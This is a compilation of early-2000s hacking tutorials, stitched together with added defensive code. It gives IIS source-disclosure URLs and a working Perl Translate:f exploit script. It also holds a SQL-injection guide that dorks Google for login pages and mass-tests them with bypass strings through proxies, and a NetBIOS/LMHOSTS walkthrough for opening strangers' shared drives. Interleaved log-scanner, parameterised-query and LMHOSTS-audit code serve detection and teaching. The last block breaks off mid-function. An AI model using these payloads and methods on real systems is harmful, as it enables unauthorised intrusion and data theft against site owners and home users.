    Microsoft has produced a hotfix for IIS versions 3.0 and 4.0. The fix involves IIS "supporting NTFS alternate data streams by asking Windows NT to make the file name canonical", according to Microsoft.

    To view or get the source of an .asp file, type the following from your browser:

    http://www.victim.com/default.asp::$DATA

    and you will get the source code.

    =========ASP Dot Bug====================

    The famous L0pht group discovered the ASP dot bug in 1997. The vulnerability involved being able to reveal ASP source code to attackers. By appending one or more dots to the end of an ASP URL under IIS 3.0, it was possible to view the ASP source code.

    The exploit worked by appending a dot to the end of an ASP URL as follows:

    http://www.victim.com/sample.asp.

    ======ISM.DLL Buffer Truncation===============

    This bug was found by the Cerberus Information Security team. It affects IIS 4.0 and 5.0 and allows attackers to view the content of files and the source code of scripts.

    By making a specially formed request to IIS, with the name of the file and then appending around 230 or more "%20" (these represent spaces) and then appending ".htr", this tricks IIS into thinking that the client is requesting a ".htr" file. The .htr file extension is mapped to the ISM.DLL ISAPI application and IIS redirects all requests for .htr resources to this DLL.

    ISM.DLL is then passed the name of the file to open and execute, but before doing this ISM.DLL truncates the buffer sent to it, chopping off the .htr and a few spaces, and ends up opening the file we want to get the source of. The contents are then returned.

    This attack can only be launched once though, unless the web service is stopped and started. It will only work when ISM.DLL is first loaded into memory.

    An attacker can view the source of global.asa, for instance, as follows:

    http://www.victim.com/global.asa%20%20(...<=230)global.asa.htr

    This will reveal the source of global.asa.

    ==========.idc & .ida Bugs=======================

    This exploit is actually similar to the ASP dot bug; however, this time we get the path of the web directory on IIS 4.0. I have even seen this bug working on IIS 5.0 in my pen-tests. Adding an ".idc" or ".ida" extension to the end of the URL will cause IIS installations to try to run the so-called .IDC through the database connector .DLL. If the .idc does not exist, then it will return something rather informative about the server.

    http://www.victim.com/anything.idc or anything.idq

    You will get the path.

    ============+.htr Bug===========================

    This exploit is also ever so similar to the ASP dot bug, and you can get the source code of ASA and ASP files by appending "+.htr" to the URL of asp and asa files.

    http://www.victim.com/global.asa+.htr

    You may get the source code to browse.

    ===========NT Site Server Adsamples Vulnerability ======

    By requesting site.csc, which is normally located in /adsamples/config/site.csc, the attacker may be able to retrieve the DSN, UID and PASS of the database, as this file may contain them.

    By typing the following:

    http://www.victim.com/adsamples/config/site.csc

    the attacker will download the file site.csc and (s)he can get some important data.

    ==========Password Attack to User Accounts===========

    IIS 4.0 has an interesting feature that can allow a remote attacker to attack user accounts local to the web server as well as other machines across the internet. Added to this, if your web server is behind a firewall performing NAT (network address translation), machines on the inside could be attacked as well.

    By default every install of IIS 4.0 creates a virtual directory "/iisadmpwd". This directory contains a number of .htr files. Anonymous users are allowed to access these files; they are not restricted to the loopback address (127.0.0.1). The following is a list of files found in the /iisadmpwd directory, which physically maps to c:\winnt\system32\inetsrv\iisadmpwd:

    Achg.htr

    Aexp.htr

    Aexp2.htr

    Aexp2b.htr

    Aexp3.htr

    Aexp4.htr

    Aexp4b.htr

    Anot.htr

    Anot3.htr

    These files are pretty much variants of the same file and allow a user to change their password via the web. They can also be used to enumerate valid accounts through guesswork.

    If the user account does not exist, a message will be returned saying "invalid domain".

    If the account exists but the password is wrong, then the message will say so.

    If an IP address followed by a backslash precedes the account name, then the IIS server will contact the remote machine, over the NetBIOS session port 139, and attempt to change the user's password. (x.x.x.x\ACCOUNTNAME)

    Therefore, if you do not need this service, remove the /iisadmpwd directory. This will prevent attackers.

    =============Translate:f Bug ====================

    Daniel Docekal brought this issue up on BugTraq this summer, August 15, 2000 (www.securityfocus.com/bid/1578). The actual problem is with the WebDAV implementation in Office 2000 and FrontPage 2000 Server Extensions.

    When someone makes a request for an ASP/ASA or any other scriptable page and adds "Translate: f" to the headers of the HTTP GET (headers are not part of the URL, but part of the HTTP request), then they come up with the complete ASP/ASA source code on Win2K with SP1 not installed.

    Translate: f is a legitimate header for WebDAV and is used in WebDAV compatible clients and in FP2000 to get the file for editing.

    Simply adding "Translate: f" and placing "/" at the end of the request to HTTP GET will lead to the security bug.

    It is a Win2K bug, but due to FP2000 being installed on IIS 4.0, it is also an IIS 4.0 bug.

    You can use the following Perl script to use this exploit.

    #############################
    use IO::Socket;             #
    my ($port, $sock, $server); #
    #############################

    $server = "$ARGV[0]";
    $port   = "80";
    $cm     = "$ARGV[1]";

    &connect;

    sub howto {
        print "type as follows: Trans.pl www.victim.com codetoview.asp \n\n";
    }

    sub connect {
        if ($#ARGV < 1) {
            howto();
            exit;
        }
        # The request: the page name with a trailing %5C and the Translate: f header
        $ver = "GET /$cm%5C HTTP/1.0\r\nHost: $server\r\nAccept: */*\r\nTranslate: f\r\n\r\n";
        my ($iaddr, $paddr, $proto);
        $iaddr = inet_aton($server) || die "Error: $!";
        $paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
        $proto = getprotobyname('tcp') || die "Error: $!";
        socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Error: $!";
        connect(SOCK, $paddr) || die "Error: $!";
        send(SOCK, $ver, 0) || die "Can't send packet: $!";
        open(OUT, ">$server.txt") || die "Error: $!";
        print "Dumping $cm to $server.txt \n";
        while (<SOCK>) {
            print OUT $_;    # write each response line to the dump file
        }
        close OUT;
        close(SOCK);
        exit(1);
    }

    If we call the script Trans.pl then we can get ASA/ASP source code as follows:

    Trans.pl www.victim.com codetoview.asp

    And there you go, you get the source code of codetoview.asp.

    04- Conclusion

    All the information I have given you has been widely used in the wild. However, what I tried to do was just to collect all this information together so as to check the security of our famous IIS 4.0 and 5.0. Whenever I encounter an IIS web server during my pen-tests, I do check for these vulnerabilities and most of the time one of these works.

    I hope that what I have written has helped you in some way. Thanks for reading it; please continue to support me as I continue to release this sort of paper. If you want to learn more, please check the mentioned people's web sites for more details, and you can even write to me.

    Peace in mind

    Watch your servers in the wild
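Every request shape in the paper above leaves a recognizable trace in the web server's access log, which is where an administrator of an IIS 4.0/5.0 box would look for them. The following is an added example, not part of the post or of the paper it reproduces: a small Python scanner that reads constructed IIS W3C extended log lines (date, time, client IP, method, URI stem, URI query and status) and tags the URL shapes named in the paper (.htw hit-highlighting with CiWebhitsfile, ::$DATA, the trailing dot, +.htr, the ISM.DLL %20 padding, .idc/.ida/.idq probes, /iisadmpwd/ and site.csc). The log lines, rule names and function names are constructed for the example. The Translate: f variant lives in a request header, so it is not visible in a stem/query log and is not covered here.

```python
import re
from urllib.parse import unquote

# Constructed sample in IIS W3C extended log format (not a real log).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2000-09-01 10:00:01 10.0.0.5 GET /default.asp - 200
2000-09-01 10:00:02 10.0.0.5 GET /null.htw CiWebhitsfile=/default.asp&CiRestriction=none&CiHiliteType=full 200
2000-09-01 10:00:03 10.0.0.5 GET /iissamples/issamples/oop/qfullhit.htw ciwebhitsfile=/../../winnt/repair/sam._&cirestriction=none&cihilitetype=full 200
2000-09-01 10:00:04 10.0.0.5 GET /default.asp::$DATA - 200
2000-09-01 10:00:05 10.0.0.5 GET /sample.asp. - 200
2000-09-01 10:00:06 10.0.0.5 GET /global.asa+.htr - 200
2000-09-01 10:00:07 10.0.0.5 GET /global.asa%20%20%20%20global.asa.htr - 200
2000-09-01 10:00:08 10.0.0.5 GET /anything.idc - 404
2000-09-01 10:00:09 10.0.0.5 GET /adsamples/config/site.csc - 200
2000-09-01 10:00:10 10.0.0.5 GET /iisadmpwd/aexp.htr - 200
2000-09-01 10:00:11 10.0.0.9 GET /products.asp id=3 200
"""

# (rule name, predicate over the decoded, lower-cased stem and query); first match wins.
RULES = [
    ("htw-source-disclosure", lambda s, q: s.endswith(".htw") and "ciwebhitsfile=" in q),
    ("ntfs-data-stream",      lambda s, q: s.endswith("::$data")),
    ("asp-dot",               lambda s, q: re.search(r"\.(asp|asa)\.+$", s) is not None),
    ("htr-append",            lambda s, q: re.search(r"\.(asp|asa)\+\.htr$", s) is not None),
    ("ism-truncation",        lambda s, q: re.search(r"\.(asp|asa)\s+\S*\.htr$", s) is not None),
    ("idc-ida-path-leak",     lambda s, q: re.search(r"\.(idc|ida|idq)$", s) is not None),
    ("adsamples-site-csc",    lambda s, q: s.endswith("/adsamples/config/site.csc")),
    ("iisadmpwd",             lambda s, q: s.startswith("/iisadmpwd/")),
]


def classify(stem, query):
    """Return the matching rule name for one request, or None."""
    s = unquote(stem).lower()          # %20 becomes a space, so the ISM.DLL padding is visible
    q = unquote(query).lower() if query != "-" else ""
    for name, pred in RULES:
        if pred(s, q):
            return name
    return None


def scan_iis_log(text):
    """Parse W3C log lines and return one record per suspicious request."""
    hits = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue                   # directives (#Fields, #Date, ...) carry no request
        fields = line.split()
        if len(fields) != 7:
            continue                   # malformed or differently configured line: skip, do not crash
        date, time, client, method, stem, query, status = fields
        rule = classify(stem, query)
        if rule:
            hits.append({"rule": rule, "client": client, "stem": stem, "status": status})
    return hits


if __name__ == "__main__":
    for h in scan_iis_log(SAMPLE_LOG):
        print(f'{h["client"]:<10} {h["rule"]:<22} {h["stem"]}')
```

The rules are deliberately narrow (an `.asp` or `.asa` stem followed by the suffix) so that ordinary `.htr` or `.htw` traffic on a server that legitimately uses those handlers is not flagged; a 404 on an `.idc`/`.ida` probe is still reported, since the point of that request is the error page, not the content.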

  8. Author: ComSec

    One of the major problems with SQL is the poor security surrounding login and URL strings.

    This tutorial is not going to go into detail on why these strings work, as I am not a coder; I just know what I know and it works.

    SEARCH:

    admin\login.asp

    login.asp

    With these two search strings you will have plenty of targets to choose from... finding one that's vulnerable is another question.

    WHAT I DO :

    First let me go into details on how I go about my research.

    I have gathered plenty of injection strings for quite some time, like the ones below, and have just been granted access to a test machine and will be testing for many variations and new inputs... legally, cool... provided by my good friend Gsecur aka ICE, also an Astal member, http://governmentsecurity.org "thanks mate". It gives me a chance to concentrate on what I am doing and not be looking over my shoulder.

    INJECTION STRINGS:HOW ?

    this is the easiest part...very simple

    on the login page just enter something like

    user:admin (you dont even have to put this.)

    pass:' or 1=1--

    or

    user:' or 1=1--

    admin:' or 1=1--

    some sites will have just a password so

    password:' or 1=1--

    In fact I have compiled a combo list with strings like this to use on my chosen targets... there are plenty of strings about; the list below is a sample of the most commonly used.

    There are many other strings involving, for instance, UNION table access via reading the error pages' table structure; thus an attack with this method will eventually reveal admin U\P paths... but that's another paper.

    The ones I am interested in are quick access to targets.

    PROGRAM

    I tried several programs to use with these search strings and up to now only Ares has performed well, with quite a bit of success with a combo list formatted this way; yesterday I loaded 40 eastern targets with 18 positive hits in a few minutes.

    How long would it take to go through 40 sites cutting and pasting each string??

    combo example:

    admin:' or a=a--

    admin:' or 1=1--

    and so on... it doesn't have to be admin, it can be anything you want... the most important part is, for example, ' or 1=1-- this is our injection string.

    Now the only trudge part is finding targets to exploit... so I tend to search, say, Google for login.asp or whatever:

    inurl:login.asp

    index of:/admin/login.asp

    like this: index of login.asp

    result:

    http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search

    17,000 possible targets; trying various searches spews out plenty more.

    Now using proxies set in my browser I then click through interesting targets... seeing what's what on the site pages; if interesting I then cut and paste the URL as a possible target... after an hour or so you have a list of sites of potential targets like so:

    http://www.somesite.com/login.asp

    http://www.another.com/admin/login.asp

    and so on... in a couple of hours you can build up quite a list... the reason I don't select all results or spider for login pages is I want to keep the noise level low... my ISP.. well, enough said... plus atm I am on dial-up, so too slow for me.

    I then save the list, fire up Ares and enter (1) a proxy list (2) my target IP list (3) my combo list... start.. now I don't want to go into problems with users using Ares.. thing is I know it works for me...

    Sit back and wait... any target vulnerable will show up in the hits box... now when it finds a target it will spew all the strings on that site as vulnerable... you have to go through each one on the site by cutting and pasting the string till you find the right one.. but the thing is you know you CAN access the site... really I need a program that will return the hit with a click on the URL and ignore false outputs.

    I am still looking.... thing is it saves quite a bit of time going to each site and each string to find it's not exploitable.

    There you go, you should have access to your vulnerable target by now.

    Another thing: you can use the strings in the URLs where user=? Edit the URL to the = part and paste ' or 1=1-- so it becomes

    user=' or 1=1-- just as quick as the login process.

    (Variations)

    admin'--

    ' or 0=0 --

    " or 0=0 --

    or 0=0 --

    ' or 0=0 #

    " or 0=0 #

    or 0=0 #

    ' or 'x'='x

    " or "x"="x

    ') or ('x'='x

    ' or 1=1--

    " or 1=1--

    or 1=1--

    ' or a=a--

    " or "a"="a

    ') or ('a'='a

    ") or ("a"="a

    hi" or "a"="a

    hi" or 1=1 --

    hi' or 1=1 --

    hi' or 'a'='a

    hi') or ('a'='a

    hi") or ("a"="a

    happy hunting

    ComSec aka ZSL

    http://comsec.governmentsecurity.org

    *******************************************

    WARNING: the information provided is for educational purposes only and not to be used for malicious use. I hold no responsibility for your actions... do the right thing and let admins know, ay.

    ******************************************
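All the strings in the post above work for one reason: the login page pastes user input straight into the SQL text, so a quote closes the string literal and `--` comments out whatever follows. The block below is an added example, not the post's code and not Ares or any other tool it mentions. It builds a two-row SQLite table, implements the login query both the vulnerable way and with a parameterised query, and runs a handful of the post's variation strings against each so you can see which ones bypass authentication and why the parameterised form is immune. The table contents, user names and the `probe` helper are constructed for the example; a real system would store salted password hashes rather than the plaintext column used here to keep the focus on the query.

```python
import sqlite3

# Constructed sample user table (plaintext passwords only to keep the demo short).
USERS = [("admin", "S3cret!"), ("alice", "hunter2")]


def make_db():
    """In-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(conn, username, password):
    """The classic pattern: user input concatenated into the SQL text."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        # A malformed injection produces a database error; fail closed here
        # (the ASP pages of the era echoed the error text to the browser instead).
        return False


def login_safe(conn, username, password):
    """Parameterised query: the driver passes the values separately, so quotes
    and comment markers inside them are data, never SQL syntax."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row is not None


# A few of the variation strings listed in the post, used as the password field.
BYPASS_STRINGS = ["' or 1=1--", "' or 0=0 --", "' or 'x'='x", "admin'--", "' or a=a--"]


def probe(conn, login_fn, strings=BYPASS_STRINGS):
    """Return the strings that log in as some user when supplied as the password
    of a non-existent account. A login routine that returns anything but [] here
    is building SQL from input."""
    return [s for s in strings if login_fn(conn, "nobody", s)]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login accepts:", probe(db, login_vulnerable))
    print("parameterised login accepts:", probe(db, login_safe))
```

Note that `admin'--` does not get past the vulnerable version when used as the password (it only closes the literal and comments out the trailing quote, leaving a real password comparison), and `' or a=a--` raises an error because `a` is not a column; both behave exactly as they would against the real sites the post describes, which is why the post's list contains so many variants.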

  9. By anand bhaskar

    --------------hacking the bios--------------

    by anand bhaskar.

    hey friends,

    I know hacking with BIOS is considered lame by the hackers and it indeed is lame, but I am sure this gives good practice at the initial stages and some idea of what the hell it's like getting into someone else's computer. The basic limitation of this method is that only shared files can be accessed. However, there are ways to hack the not-shared ones too, but this is all I wish to provide you all for now. Enjoy.

    introduction

    1. Hardware and Firmware

    1a. The BIOS

    The BIOS, short for Basic Input/Output Services, is the control

    program of the PC. It is responsible for starting up your computer,

    transferring control of the system to your operating system, and

    for handling other low-level functions, such as disk access.

    NOTE that the BIOS is not a software program, insofar as it is

    not purged from memory when you turn off the computer. It's

    firmware, which is basically software on a chip. :)

    A convenient little feature that most BIOS manufacturers include

    is a startup password. This prevents access to the system until

    you enter the correct password.

    If you can get access to the system after the password has been

    entered, then there are numerous software-based BIOS password

    extractors available from your local H/P/A/V site. :)

    NETBIOS/NBTSTAT - What does it do?

    2. NETBIOS, also known as NBTSTAT, is a program run on the Windows system and is used for identifying a remote network or computer with file sharing enabled. We can exploit systems using this method. It may be old, but on home PCs sometimes it still works great. You can use it on your friend at home or something. I don't care what you do, but remember that you are reading this document because you want to learn. So I am going to teach you. Ok. So, you ask, "How do I get to NBTSTAT?" Well, there are two ways, but one's faster.

    Method 1

    -===============-

    Start

    Programs

    MSDOS PROMPT

    Type NBTSTAT

    -===============-

    Method 2

    -===============-

    Start

    Run

    Type Command

    Type NBTSTAT

    -===============-

    (Note: Please, help your poor soul if that isn't like feeding you with a baby spoon.)

    Ok! Now since you're in the DOS command under NBTSTAT, you're probably wondering what all that crap is that's on your screen. These are the commands you may use. I'm only going to give you what you need to know since you are striving to be l33t. Your screen should look like the following:

    ----------------------------------------------------------------------------------------------

    NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n]
    [-r] [-R] [-RR] [-s] [-S] [interval] ]

    -a (adapter status) Lists the remote machine's name table given its name
    -A (Adapter status) Lists the remote machine's name table given its IP address.
    -c (cache) Lists NBT's cache of remote [machine] names and their IP addresses
    -n (names) Lists local NetBIOS names.
    -r (resolved) Lists names resolved by broadcast and via WINS
    -R (Reload) Purges and reloads the remote cache name table
    -S (Sessions) Lists sessions table with the destination IP addresses
    -s (sessions) Lists sessions table converting destination IP addresses to computer NETBIOS names.
    -RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts Refresh

    RemoteName Remote host machine name.
    IP address Dotted decimal representation of the IP address.
    interval Redisplays selected statistics, pausing interval seconds between each display. Press Ctrl+C to stop redisplaying statistics.

    C:\WINDOWS\DESKTOP>

    -----------------------------------------------------------------------------------------------

    The only two commands that are going to be used and here they are:

    -a (adapter status) Lists the remote machine's name table given its name

    -A (Adapter status) Lists the remote machine's name table given its IP address.

    Host Names

    3. Now, the -a means that you will type in the HOST NAME of the person's computer that you are trying to access. Just in case you don't have any idea what a Host Name looks like here's an example.

    123-fgh-ppp.internet.com

    There are many variations of these addresses. For each different address you see there is a new ISP assigned to that computer. Look at the difference.

    abc-123.internet.com

    ghj-789.newnet.com

    These are different host names as you can see, and, by identifying the last couple of words you will be able to tell that these are two computers on two different ISPs. Now, here are two host names on the same ISP but a differently located server.

    123-fgh-ppp.internet.com

    567-cde-ppp.internet.com

    IP Addresses

    4. You can resolve these host names, if you want, to the IP address (Internet Protocol).

    IP addresses range in different numbers. An IP looks like this:

    201.123.101.123

    Most times you can tell if a computer is running on a cable connection because of the IP address's numbers. On faster connections, usually the first two numbers are low. here's a cable connection IP.

    24.18.18.10

    on dialup connections IP's are higher, like this:

    208.148.255.255

    notice the 208 is higher than the 24 which is the cable connection.

    REMEMBER THOUGH, NOT ALL IP ADDRESSES WILL BE LIKE THIS.

    Some companies make IP addresses like this to fool the hacker into believing it's a dialup, as a hacker would expect something big, like a T3 or an OC-18. Anyway This gives you an idea on IP addresses which you will be using on the nbtstat command.

    Getting The IP Through DC (Direct Connection)

    5. First, you're going to need to find his IP or host name. Either will work. If you are on mIRC you can get it by typing /whois (nick) ...where (nick) is the person's nickname without parentheses. You will either get a host name or an IP. Copy it down. If you do not get it or you are not using mIRC then you must direct connect to their computer or you may use a sniffer to figure out his IP or host name. It's actually better to do it without the sniffer because most sniffers do not work now-a-days. So you want to establish a direct connection to their computer. OK, what is a direct connection? When you are:

    Sending a file to their computer you are directly connected.

    AOL INSTANT MESSENGER allows a Direct Connection to the user if accepted.

    ICQ when sending a file or a chat request acceptance allows a direct connection.

    Any time you are sending a file, you are directly connected. (Assuming you know the user is not using a proxy server.)

    Voice Chatting on Yahoo establishes a direct connection.

    If you have none of these programs, I suggest you either get one, get a sniffer, or read this next statement.

    If you have any way of sending them a link to your site that enables site traffic statistics, and you can log in, send a link to your site, then check the stats and get the IP of the last visitor. It's a simple and easy method I use. It even fools some smarter hackers, because it catches them off guard. Anyway, once you are directly connected use either of the two methods I showed you earlier and get into DOS. Type NETSTAT -n. NETSTAT is a program whose name is short for NET STATISTICS. It will show you all computers connected to yours. (This is also helpful if you think you are being hacked by a trojan horse that is on a port that you know, such as Sub Seven: 27374.) Your screen should look like this showing the connections to your computer:

    ------------------------------------------------------------------------------------------------

    C:\WINDOWS\DESKTOP>netstat -n

    Active Connections

    Proto Local Address Foreign Address State

    TCP 172.255.255.82:1027 205.188.68.46:13784 ESTABLISHED

    TCP 172.255.255.82:1036 205.188.44.3:5190 ESTABLISHED

    TCP 172.255.255.82:1621 24.131.30.75:66 CLOSE_WAIT

    TCP 172.255.255.82:1413 205.188.8.7:26778 ESTABLISHED

    TCP 172.255.255.82:1483 64.4.13.209:1863 ESTABLISHED

    C:\WINDOWS\DESKTOP>

    ------------------------------------------------------------------------------------------------

    The first line indicates the Protocol (language) that is being used by the two computers.

    TCP (Transfer Control Protocol) is being used in this and is most widely used.

    Local address shows your IP address, or the IP address of the system you are on.

    Foreign address shows the address of the computer connected to yours.

    State tells you what kind of connection is being made. ESTABLISHED means it will stay connected to you as long as you are on the program or as long as the computer is allowing or is needing the other computer's connection to it. CLOSE_WAIT means the connection closes at times and waits until it is needed or you resume connection to be made again. One that isn't on the list is TIME_WAIT, which means it is timed. Most Ads that run on AOL are using TIME_WAIT states.

    the way you know the person is directly connected to your computer is because of this:

    ------------------------------------------------------------------------------------------------

    C:\WINDOWS\DESKTOP>netstat -n

    Active Connections

    Proto Local Address Foreign Address State

    TCP 172.255.255.82:1027 205.188.68.46:13784 ESTABLISHED

    TCP 172.255.255.82:1036 205.188.44.3:5190 ESTABLISHED

    TCP 172.255.255.82:1621 24.131.30.75:66 CLOSE_WAIT

    TCP 172.255.255.82:1413 abc-123-ppp.webnet.com ESTABLISHED

    TCP 172.255.255.82:1483 64.4.13.209:1863 ESTABLISHED

    C:\WINDOWS\DESKTOP>

    ------------------------------------------------------------------------------------------------

    Notice the host name is included in the fourth line instead of the IP address as on all the others. This is almost ALWAYS the other computer that is connected to you. So here, now, you have the host name:

    abc-123-ppp.webnet.com

    If the host name is not listed and the IP is, then it is NO PROBLEM because either one works exactly the same. I am using the abc-123-ppp.webnet.com host name as an example. Ok, so now you have the IP and/or host name of the remote system you want to connect to. Time to hack!

    Open up your DOS command. Open up NBTSTAT by typing NBTSTAT. Ok, there's the crap again. Well, now it's time to try out what you have learned from this document by testing it on the IP and/or host name of the remote system. Here's the only thing you'll need to know.

    IMPORTANT, READ NOW!!!

    -a (adapter status) Lists the remote machine's name table given its name

    -A (Adapter status) Lists the remote machine's name table given its IP address.

    Remember this?

    Time to use it.

    -a will be the host name

    -A will be the IP

    How do i know this?

    Read the Statements following the -a -A commands. It tells you there what each command takes.

    So have you found which one you have to use?

    GOOD!

    Time to start.

    Using it to your advantage

    6. Type this if you have the host name only.

    NBTSTAT -a (In here put in hostname without parenthesis)

    Type this is you have the IP address only.

    NBTSTAT -A (In here put in IP address without parenthesis)

    Now, hit enter and wait. Now either one of two things comes up:

    1. Host not found

    2. Something that looks like this:

    --------------------------------------------

    NetBIOS Local Name Table

    Name Type Status

    ---------------------------------------------

    GMVPS01 <00> UNIQUE Registered

    WORKGROUP <00> GROUP Registered

    GMVPS01 <03> UNIQUE Registered

    GMVPS01 <20> UNIQUE Registered

    WORKGROUP <1E> GROUP Registered

    ---------------------------------------------

    If the computer responded "Host not found" then either one of two things is the case:

    1. You screwed up the host name.

    2. The host is not hackable.

    If number one is the case you're in great luck. If two, This system isn't hackable using the NBTSTAT command. So try another system.

    If you got the table as above to come up, look at it carefully as i describe to you each part and its purpose.

    Name - states the share name of that certain part of the computer

    <00>, <03>, <20>, <1E> - Are the hexadecimal codes giving you the services available on that share name.

    Type - Is self-explanatory. It's either turned on, or activated by you, or always on.

    Status - Simply states that the share name is working and is activated.

    Look above and look for the following line:

    GMVPS01 <20> UNIQUE Registered

    See it?

    GOOD! Now this is important, so listen up. The hexadecimal code <20> means that file sharing is enabled on the share name that is on that line with the hex number. So that means GMVPS01 has file sharing enabled. So now you want to hack this. Here's how to do it. (This is the hard part)

    LMHOST File

    7. There is a file in all Windows systems called LMHOST.sam. We need to simply add the IP into the LMHOST file because LMHOST basically acts as a network, automatically logging you on to it. So go to Start, Find, Files or Folders. Type in LMHOST and hit enter. When it comes up, open it using a text program such as WordPad, but make sure you do not leave the checkmark on "always open files with this extension". Simply go through the LMHOST file until you see the part:

    # This file is compatible with Microsoft LAN Manager 2.x TCP/IP lmhosts

    # files and offers the following extensions:

    #

    # #PRE

    # #DOM:

    # #INCLUDE

    # #BEGIN_ALTERNATE

    # #END_ALTERNATE

    # \0xnn (non-printing character support)

    #

    # Following any entry in the file with the characters "#PRE" will cause

    # the entry to be preloaded into the name cache. By default, entries are

    # not preloaded, but are parsed only after dynamic name resolution fails.

    #

    # Following an entry with the "#DOM:" tag will associate the

    # entry with the domain specified by . This affects how the

    # browser and logon services behave in TCP/IP environments. To preload

    # the host name associated with #DOM entry, it is necessary to also add a

    # #PRE to the line. The is always preloaded although it will not

    # be shown when the name cache is viewed.

    #

    # Specifying "#INCLUDE " will force the RFC NetBIOS (NBT)

    # software to seek the specified and parse it as if it were

    # local. is generally a UNC-based name, allowing a

    # centralized lmhosts file to be maintained on a server.

    # It is ALWAYS necessary to provide a mapping for the IP address of the

    # server prior to the #INCLUDE. This mapping must use the #PRE directive.

    # In addtion the share "public" in the example below must be in the

    # LanManServer list of "NullSessionShares" in order for client machines to

    # be able to read the lmhosts file successfully. This key is under

    # \machine\system\currentcontrolset\services\lanmanserver\parameters\nullsessionshares

    # in the registry. Simply add "public" to the list found there.

    #

    # The #BEGIN_ and #END_ALTERNATE keywords allow multiple #INCLUDE

    # statements to be grouped together. Any single successful include

    # will cause the group to succeed.

    #

    # Finally, non-printing characters can be embedded in mappings by

    # first surrounding the NetBIOS name in quotations, then using the

    # \0xnn notation to specify a hex value for a non-printing character.

    Read this over and over until you understand the way you want your connection to be set. Here's an example of how to add an IP the way I would do it:

    #PRE #DOM:255.102.255.102 #INCLUDE

    Pre will preload the connection as soon as you log on to the net. DOM is the domain or IP address of the host you are connecting to. INCLUDE will automatically set you to that file path. In this case as soon as I log on to the net I will get access to 255.102.255.102 on the C:/ drive. The only problem with this is that they could run the NETSTAT command while you are connected and get the IP of your machine. That's why it only works on simple PC machines. Because people in these days are computer illiterate and have no idea of what these commands can do. They have no idea what NETSTAT is, so you can use that to your advantage. Most PC systems are kind of hard to hack using this method now because they are more secure and can tell when another system is trying to gain access. Also, be sure that you (somehow) know whether they are running a firewall or not because it will block the connection to their computer. Most home systems aren't running a firewall, and to make it better, they don't know how to operate the firewall, therefore leaving the hole in the system. To help you out some, it would be a great idea to pick up on some programming languages to show you how the computer reads information and learn some things on TCP/IP (Transfer Control Protocol/Internet Protocol). If you want to find out whether they are running a firewall, simply hop on a Proxy and do a port scan on their IP. You will notice if they are running a firewall because most ports are closed. Either way, you still have a better chance of hacking a home system than hacking Microsoft.

    Gaining Access

    7. Once you have added this to you LMHOST file. You are basically done. All you need to do is go to:

    Start

    Find

    Computer

    Once you get there you simply type the IP address or the host name of the system. When it comes up, simply double click it, and boom! There's a GUI for you so you don't have to use DOS anymore. You can use DOS to do it, but it's more simple and fun this way, so that's the only way I put it. When you open the system you can edit, delete,
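    Added example (editor's code, not part of the post above and not the tutorial author's): the post relies on LMHOSTS keywords, and the same keywords are exactly what a defender audits for, because LMHOSTS is a static, local override of NetBIOS name resolution. A planted #PRE/#DOM: line pins a domain controller name to an attacker's IP, and a #INCLUDE pointing at a remote UNC path makes the machine load name mappings from a file someone else controls. The parser below follows the documented file format (#PRE, #DOM:<domain>, #INCLUDE \\server\share\file, #BEGIN_ALTERNATE/#END_ALTERNATE, quoted names with \0xnn hex escapes for the 16th suffix byte); the sample file content, hostnames, IPs and paths are constructed for the example.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample LMHOSTS content for this example. The hostnames, IPs,
# domain and share paths are invented; none of them come from the post above.
SAMPLE_LMHOSTS = r'''# LMHOSTS sample (constructed for the example)
192.168.1.10    FILESRV01                   #PRE
192.168.1.11    DC01                        #PRE #DOM:CORP
192.168.1.12    "appname        \0x14"      #PRE
#INCLUDE \\192.168.1.11\public\lmhosts
#BEGIN_ALTERNATE
#INCLUDE \\DC01\public\lmhosts
#END_ALTERNATE
'''
# The quoted name above is 7 characters + 8 spaces + suffix byte 0x14 = 16 bytes.

HEX_ESCAPE = re.compile(r'\\0x([0-9A-Fa-f]{2})')
# <dotted IPv4>  <name or "quoted name">  <optional #PRE / #DOM:domain keywords>
ENTRY = re.compile(r'^(\d{1,3}(?:\.\d{1,3}){3})\s+("[^"]*"|\S+)(.*)$')


def decode_netbios_name(raw: str) -> str:
    """Expand \\0xnn escapes in a quoted NetBIOS name. Quoted names are taken
    literally, spaces included, so the writer can set the 16th (suffix) byte."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), raw)


@dataclass
class HostEntry:
    ip: str
    name: str
    preload: bool = False          # #PRE: loaded into the name cache at startup
    domain: Optional[str] = None   # #DOM:<domain>: marks a domain controller


@dataclass
class LmhostsAudit:
    hosts: List[HostEntry] = field(default_factory=list)
    includes: List[str] = field(default_factory=list)
    findings: List[str] = field(default_factory=list)


def parse_lmhosts(text: str) -> LmhostsAudit:
    """Parse LMHOSTS lines and record the entries worth a second look:
    remote #INCLUDE paths and #PRE/#DOM mappings that pin a DC to an IP."""
    audit = LmhostsAudit()
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped:
            continue
        if stripped.startswith('#'):
            # Only #INCLUDE matters here; #BEGIN/#END_ALTERNATE and plain
            # comments are skipped.
            if stripped.upper().startswith('#INCLUDE'):
                path = stripped[len('#INCLUDE'):].strip()
                audit.includes.append(path)
                if path.startswith('\\\\'):
                    audit.findings.append(
                        f'line {lineno}: #INCLUDE loads name mappings from remote path {path}')
            continue
        m = ENTRY.match(stripped)
        if not m:
            audit.findings.append(f'line {lineno}: unparseable entry {stripped!r}')
            continue
        ip, raw_name, rest = m.groups()
        quoted = raw_name.startswith('"')
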